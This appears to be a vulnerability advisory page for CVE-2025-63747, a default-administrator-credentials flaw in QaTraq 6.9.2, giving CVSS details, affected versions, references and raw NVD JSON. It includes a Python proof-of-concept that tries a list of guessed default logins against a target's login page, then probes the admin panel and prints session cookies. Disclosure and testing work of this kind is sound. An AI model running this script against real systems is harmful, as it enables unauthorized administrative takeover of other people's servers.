Security Vulnerability Report
CVE-2025-63747 CVSS 9.8 CRITICAL

Published: 2025-11-17 16:15:50
Last Modified: 2025-11-26 15:50:36

Description

QaTraq 6.9.2 ships with administrative account credentials which are enabled in default installations and permit immediate login via the web application login page. Because the account provides administrative privileges in the default configuration, an attacker who can reach the login page can gain administrative access.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:testmanagement:qatraq:6.9.2:*:*:*:*:*:*:* - VULNERABLE
QaTraq < 6.9.2 (potentially all versions with default credentials)
QaTraq 6.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-63747 PoC - QaTraq 6.9.2 Default Credentials

This PoC demonstrates how to exploit the default credentials vulnerability
in QaTraq 6.9.2 to gain administrative access.
"""
import requests
import sys
from urllib.parse import urljoin


def exploit_qatraq_default_creds(target_url):
    """
    Exploit CVE-2025-63747 by using default credentials
    """
    # Common default credentials for QaTraq
    default_credentials = [
        {'username': 'admin', 'password': 'admin'},
        {'username': 'admin', 'password': 'qatraq'},
        {'username': 'administrator', 'password': 'administrator'},
        {'username': 'admin', 'password': 'password123'},
        {'username': 'qatraq', 'password': 'qatraq'},
    ]

    # Target login endpoint
    login_url = urljoin(target_url, '/login')

    print(f'[*] Target: {target_url}')
    print(f'[*] Login URL: {login_url}')
    print('[*] Testing default credentials...')

    session = requests.Session()

    for cred in default_credentials:
        try:
            # Prepare login request
            login_data = {
                'username': cred['username'],
                'password': cred['password'],
                'Login': 'Login'  # Common form submit button name
            }

            # Send login request
            response = session.post(
                login_url,
                data=login_data,
                timeout=10,
                allow_redirects=True
            )

            # Check if login successful
            if response.status_code == 200:
                # Check for indicators of successful login
                if 'admin' in response.text.lower() or 'logout' in response.text.lower():
                    print('[+] SUCCESS! Valid credentials found:')
                    print(f'    Username: {cred["username"]}')
                    print(f'    Password: {cred["password"]}')
                    print(f'[*] Session Cookie: {session.cookies.get_dict()}')

                    # Try to access admin panel
                    admin_url = urljoin(target_url, '/admin')
                    admin_response = session.get(admin_url)

                    if admin_response.status_code == 200:
                        print('[+] Successfully accessed admin panel!')

                    return True

        except requests.RequestException as e:
            print(f'[-] Error testing credentials: {e}')
            continue

    print('[-] No valid default credentials found')
    return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python3 {sys.argv[0]} <target_url>')
        print(f'Example: python3 {sys.argv[0]} http://vulnerable-server:8080')
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    exploit_qatraq_default_creds(target)
```

References

http://qatraq.com (Broken Link)
https://bitsbyamg.com/blog/post/2025/10/19/qatraq-692-default-creds-and-file-upload-rce (Exploit, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-63747",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-17T16:15:50.463",
    "lastModified": "2025-11-26T15:50:35.877",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "QaTraq 6.9.2 ships with administrative account credentials which are enabled in default installations and permit immediate login via the web application login page. Because the account provides administrative privileges in the default configuration, an attacker who can reach the login page can gain administrative access."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-521"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:testmanagement:qatraq:6.9.2:*:*:*:*:*:*:*",
                "matchCriteriaId": "A3D245F7-826C-4C43-9A60-338A4C59CE75"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "http://qatraq.com",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://bitsbyamg.com/blog/post/2025/10/19/qatraq-692-default-creds-and-file-upload-rce",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```